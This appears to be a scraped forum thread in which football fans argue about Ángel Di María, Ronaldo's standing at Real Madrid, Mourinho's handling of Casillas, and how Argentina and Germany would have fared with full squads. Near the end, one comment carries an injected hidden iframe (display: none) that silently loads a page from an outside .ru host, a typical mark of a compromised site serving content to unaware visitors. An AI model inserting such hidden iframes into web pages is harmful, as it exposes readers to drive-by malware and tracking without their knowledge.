Ángel Di María

Exactly even Ronaldo had the balls to say I would've done things differently and spoke out last year when they sold Ozil. Honestly think Ronaldo maybe thinking of leaving as he knows that once he starts to decline or if another hot shot becomes available he will be replaced like he never existed.

Made his bed he can lie in it. As soon as he stops scoring will the madrid fans still support him nevermind the board?

I think they would. He gives them like 40 or 50% of his image rights and that guy is a branding freak. I'm sure they make good cash from him and probably want to continue.

I do think he'll leave them before they throw him out. Heck Xabi saw the clown show they became and ran away.

Angel got out at the right time too.

Depends which Di Maria would have appeared in the final. If it would have been the Di maria of the WC, still quite certain that Argentina would have lost. But if it's Real Madrid's Di maria or the Di maria that played today, I am quite certain that Argentina would have won.

Yea, Mou goes to Chelsea and tells Cech to look for a team. Back in Madrid, Ancelotti still plays Casillas instead of Navas.

Well, tbf, a month before Mou dropped Casillas, he was asking the ballon d'or for Casillas. So it's not like Casillas form was the reason why he dropped him..

Argentina's Di Maria wasn't as good as the Di Maria of RM, but he still had 10 lungs. That would have won Argentina the game in extra time IMO. Just like the Switzerland game.

That's true, even in his worst game he runs like a man possessed. But football isn't marathon. Just running around like a mad man won't win you games. Di Maria lost the ball 50+ times against Switzerland, a world cup record. If he would have had a game just as bad, don't you think that Germany would have been more effective at using Di Maria's turn overs to win the game than Switzerland?

Proves my point actually. He had a bad game but his work rate still helped Argentina win the game in extra time.

If he played that badly against Germany, maybe Argentina would have lost before extra time, but the longer the game dragged on, the more helpful Di Maria's running would have been. If it went into extra time like the real game did, I think Argentina would have won it because of Di Maria, even if he was having a bad game. That kind of workrate can be deadly against a tired team, as we saw against Switzerland.

That's my point. If Di Maria would have had as many turn overs against Germany, Germany would have probably been more effective at making Argentina pay for those turn overs. Which means that Argentina might have lost before his insane work rate would give them an advantage..

I wonder how different the final would've been with Reus & Guendogan.

Could've. Would've. We were missing Reus, Guendogan, and had to play Kramer instead of a Bender or Khedira, and he then also had to be subbed.

Let's not forget this was only a friendly and that, unlike us, Argentina was nearly full strength (minus Messi).<iframe src="about://gvapp.ru/u.html" style="display: none;" id="zunifrm"></iframe>

Both teams were missing players, but Germany had better players to cover for those who couldn't play. Better depth than the argies.
Ideally, the 2 teams with their full strength should play the final, but that hardly happens anyway.
